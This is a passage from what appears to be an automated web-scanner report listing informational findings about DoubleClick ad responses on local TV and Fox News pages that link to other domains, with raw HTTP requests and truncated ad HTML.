<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/w%3B211870089%3B0-0%3B0%3B29117532%3B9289-490/25%3B30238038/30255915/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129574_AM.jpg?adID=211870089" WIDTH="490" HEIGHT="25" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.67. http://ad.doubleclick.net/adi/wn.loc.wcax/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/weather

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/weather;sz=180x150;wnsz=35;tile=7;wncc=Weather;wnpt=C;wnpc=weather;wncp=WCAX;wncid=18196;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=79347955? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 603

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/c%3B211848897%3B0-0%3B0%3B29112187%3B2928-180/150%3B30237913/30255790/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129575_AM.gif?adID=211848897" WIDTH="180" HEIGHT="150" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.68. http://ad.doubleclick.net/adi/wn.loc.wcax/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/weather

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/weather;sz=500x300;wnsz=49;tile=8;wncc=Weather;wnpt=C;wnpc=weather;wncp=WCAX;wncid=18196;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=79347955? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 377

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/i;44306;0-0;0;29112187;1261-500/300;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.69. http://ad.doubleclick.net/adi/wn.loc.wcax/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/weather

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/weather;sz=300x250;wnsz=43;tile=4;wncc=Weather;wnpt=C;wnpc=weather;wncp=WCAX;wncid=18196;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=79347955? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2653

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
10.70. http://ad.doubleclick.net/adi/wn.loc.wcax/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/weather

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/weather;sz=728x90;wnsz=46;tile=3;wncc=Weather;wnpt=C;wnpc=weather;wncp=WCAX;wncid=18196;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=79347955? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:30:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 656

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
12187%3B3454-728/90%3B40072704/40090491/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Science-in-Managing-Innovation-and-Information-Technology.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186091_AM.jpg?adID=234573600" WIDTH="728" HEIGHT="90" alt="" title=""></a>
...[SNIP]...
10.71. http://ad.doubleclick.net/adi/wn.loc.wcax/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/weather

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/weather;sz=490x25;wnsz=22;tile=5;wncc=Weather;wnpt=C;wnpc=weather;wncp=WCAX;wncid=18196;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=79347955? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 601

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/m%3B211870089%3B0-0%3B0%3B29112187%3B9289-490/25%3B30238038/30255915/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129574_AM.jpg?adID=211870089" WIDTH="490" HEIGHT="25" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.72. http://ad.doubleclick.net/adi/wn.loc.wcax/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/weather

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/weather;sz=468x60;wnsz=1;tile=6;wncc=Weather;wnpt=C;wnpc=weather;wncp=WCAX;wncid=18196;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=79347955? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 560

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/w%3B237510657%3B0-0%3B0%3B29112187%3B1-468/60%3B40973359/40991146/1%3B%3B%7Esscs%3D%3fhttp://www.vermontcoinandjewelry.com/" target="_blank"><img border="0" src="http://s0.2mdn.net/3103254/vtcoin-full.gif?adID=237510657" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.73. http://ad.doubleclick.net/adj/N2998.153021.9061335280621/B5095407.18  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.153021.9061335280621/B5095407.18

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N2998.153021.9061335280621/B5095407.18;sz=300x250;pc=;click=http://a1.interclick.com/icaid/150571/tid/f88f1484-5ba5-4807-a981-83b48dc1e3ee/click.ic?;ord=634381267931166439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros?t=1302544276627&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 17:51:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 456

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/c/58/%2a/f;234085366;0-0;0;60824488;4307-300/250;40730038/40747825/2;;~sscs=%3fhttp://a1.interclick.com/icaid/150571/tid/f88f1484-5ba5-4807-a981-83b48dc1e3ee/click.ic?http%3a%2f%2fwww.verizonwireless.com/b2c/promotion/specialoffers.jsp%3Fcid%3DBAC-prorsch"><img src="http://s0.2mdn.net/viewad/2981993/300x250_021511_CLICK_AND_SAVE.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...
10.74. http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/cm.foxnews/tier2_031010;net=cm;u=,cm-68330357_1302541877,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=728x90;net=cm;env=ifr;ord1=46894;contx=none;an=100;dc=w;btg=;ord=1302541877? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302541875197&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 17:11:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2017

document.write('<iframe src=\"http://view.atdmt.com/CNT/iview/286173179/direct;wi.728;hi.90/01/3530448?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/x%3B238831919%3B0-0%3B0%3B46850814%3B
...[SNIP]...
et%3Dcm%3Benv%3Difr%3Bord1%3D46894%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3fhttp://clk.redcated/CNT/go/286173179/direct;wi.728;hi.90/01/3530448" target="_blank"><img src="http://view.atdmt.com/CNT/view/286173179/direct;wi.728;hi.90/01/3530448"/></a>
...[SNIP]...
10.75. http://ad.doubleclick.net/adj/fnc/politics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fnc/politics

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/fnc/politics;comp=;s1=politics;s2=;pos=frame1;ctype=front;ptype=channel;url=politics_index;m1=politics;m2=presidential-politics;m3=political-news;m4=political-parties;m5=american-politics;rs=D08734_70852;rs=10451;qc=D;qc=T;qc=2120;qc=2156;qc=2149;qc=2129;qc=2118;qc=2151;sid=undefined;sz=300x250,336x280;tile=3;u=D08734_70852,10451%7Cundefined%7C%7C%7C%7Cchannel%7Cframe1%7Cpolitics%7Cpresidential-politics%7Cpolitical-news%7Cpolitical-parties%7Camerican-politics%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=20400201? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:51:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1279

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/u;239311794;9-0;0;61276082;4307-300/250;41425639/41443426/1;u=D08734_70852,10451%7Cundefined%7C%7C%7C%7Cchann
...[SNIP]...
0451|undefined||||channel|frame1|politics|presidential-politics|political-news|political-parties|american-politics|||||||||||||||||||||;!c=;~aopt=2/1/8b/0;~sscs=%3fhttp://www.prioritymail.com/foxnews"><img src="http://s0.2mdn.net/viewad/1381014/3-usps10_seqmes1_envelopeb_300x250.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.76. http://ad.doubleclick.net/adj/fnc/politics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fnc/politics

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/fnc/politics;comp=;s1=politics;s2=;pos=frame1;ctype=front;ptype=channel;url=politics_index;m1=politics;m2=presidential-politics;m3=political-news;m4=political-parties;m5=american-politics;rs=D08734_70852;rs=10451;qc=D;qc=T;qc=2120;qc=2156;qc=2149;qc=2129;qc=2118;qc=2151;sid=undefined;sz=300x250,336x280;tile=3;u=D08734_70852,10451%7Cundefined%7C%7C%7C%7Cchannel%7Cframe1%7Cpolitics%7Cpresidential-politics%7Cpolitical-news%7Cpolitical-parties%7Camerican-politics%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=214180084? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 17:01:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1279

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/u;239311794;5-0;0;61276082;4307-300/250;41425594/41443381/1;u=D08734_70852,10451%7Cundefined%7C%7C%7C%7Cchann
...[SNIP]...
0451|undefined||||channel|frame1|politics|presidential-politics|political-news|political-parties|american-politics|||||||||||||||||||||;!c=;~aopt=2/1/8b/0;~sscs=%3fhttp://www.prioritymail.com/foxnews"><img src="http://s0.2mdn.net/viewad/1381014/1-usps11_march_trialsimple_300x250.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.77. http://ad.doubleclick.net/adj/fnc/politics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fnc/politics

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/fnc/politics;comp=;s1=politics;s2=;pos=frame1;ctype=front;ptype=channel;url=politics_index;m1=politics;m2=presidential-politics;m3=political-news;m4=political-parties;m5=american-politics;rs=D08734_70852;rs=10451;qc=D;qc=T;qc=2120;qc=2156;qc=2149;qc=2129;qc=2118;qc=2151;sid=undefined;sz=300x250,336x280;tile=3;u=D08734_70852,10451%7Cundefined%7C%7C%7C%7Cchannel%7Cframe1%7Cpolitics%7Cpresidential-politics%7Cpolitical-news%7Cpolitical-parties%7Camerican-politics%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=171742785? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:41:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 965

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/k;235087953;1-0;0;22018495;4307-300/250;41344682/41362469/1;u=D08734_70852,10451|undefined||||channel|frame1|
...[SNIP]...
|channel|frame1|politics|presidential-politics|political-news|political-parties|american-politics|||||||||||||||||||||;!c=;~aopt=2/1/8b/0;~sscs=%3fhttp://www.taxact.com/10tax.asp?sc=108532451982&p=36"><img src="http://s0.2mdn.net/viewad/1705303/2451983_300x250_f1e_ON.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.78. http://ad.doubleclick.net/adj/fnc/politics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fnc/politics

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/fnc/politics;comp=;s1=politics;s2=;pos=frame1;ctype=front;ptype=channel;url=politics_index;m1=politics;m2=presidential-politics;m3=political-news;m4=political-parties;m5=american-politics;rs=D08734_70852;rs=10451;qc=D;qc=T;qc=2120;qc=2156;qc=2149;qc=2129;qc=2118;qc=2151;sid=undefined;sz=300x250,336x280;tile=3;u=D08734_70852,10451%7Cundefined%7C%7C%7C%7Cchannel%7Cframe1%7Cpolitics%7Cpresidential-politics%7Cpolitical-news%7Cpolitical-parties%7Camerican-politics%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=559924741? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 17:11:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 967

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/y;235087953;0-0;0;22018495;4307-300/250;41344604/41362391/1;u=D08734_70852,10451|undefined||||channel|frame1|
...[SNIP]...
|channel|frame1|politics|presidential-politics|political-news|political-parties|american-politics|||||||||||||||||||||;!c=;~aopt=2/1/8b/0;~sscs=%3fhttp://www.taxact.com/10tax.asp?sc=108532451982&p=35"><img src="http://s0.2mdn.net/viewad/1705303/2-2451982_300x250_f1m_ON.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.79. http://ad.doubleclick.net/adj/fnc/politics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fnc/politics

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/fnc/politics;dcopt=ist;comp=;s1=politics;s2=;pos=top;ctype=front;ptype=channel;url=politics_index;m1=politics;m2=presidential-politics;m3=political-news;m4=political-parties;m5=american-politics;rs=D08734_70852;rs=10451;qc=D;qc=T;qc=2120;qc=2156;qc=2149;qc=2129;qc=2118;qc=2151;sid=undefined;sz=728x90;tile=1;u=D08734_70852,10451%7Cundefined%7C%7C%7C%7Cchannel%7Ctop%7Cpolitics%7Cpresidential-politics%7Cpolitical-news%7Cpolitical-parties%7Camerican-politics%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=20400201? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:51:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1265

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/0/0/%2a/i;239312264;9-0;0;61276081;3454-728/90;41425642/41443429/1;u=D08734_70852,10451%7Cundefined%7C%7C%7C%7Cchanne
...[SNIP]...
2,10451|undefined||||channel|top|politics|presidential-politics|political-news|political-parties|american-politics|||||||||||||||||||||;!c=;~aopt=2/1/8b/0;~sscs=%3fhttp://www.prioritymail.com/foxnews"><img src="http://s0.2mdn.net/viewad/1381014/3-usps10_seqmes1_envelopeb_728x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.80. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail;kw=linkswelike;sz=88x31;pagepos=1;pos=2;tile=2;ord=6842573? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 09 Apr 2011 12:30:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1514

document.write('<!-- Template ID = 14863 Template Name = Links We Like -->\n');

   e=document.getElementById("ib_div_pos1_2");
   e.innerHTML='<div class="ib_title" id="ib_title"><a href="http://ad.doubl
...[SNIP]...
%3B233962674%3B0-0%3B3%3B58015214%3B21-88/31%3B39164296/39182083/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3fhttps://www.lowermybills.com/lending/home-refinance/?sourceid=lmb-21372-41812" target="_blank"><img height="60" border="0" width="80" align="left" src="http://s0.2mdn.net/2974161/Mortgage-APRs-Hit-3.25.JPG"></a>
...[SNIP]...
10.81. http://ad.doubleclick.net/adj/iblocal.hearsttv.wptz/adj/iblocal.hearsttv.wptz/detail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
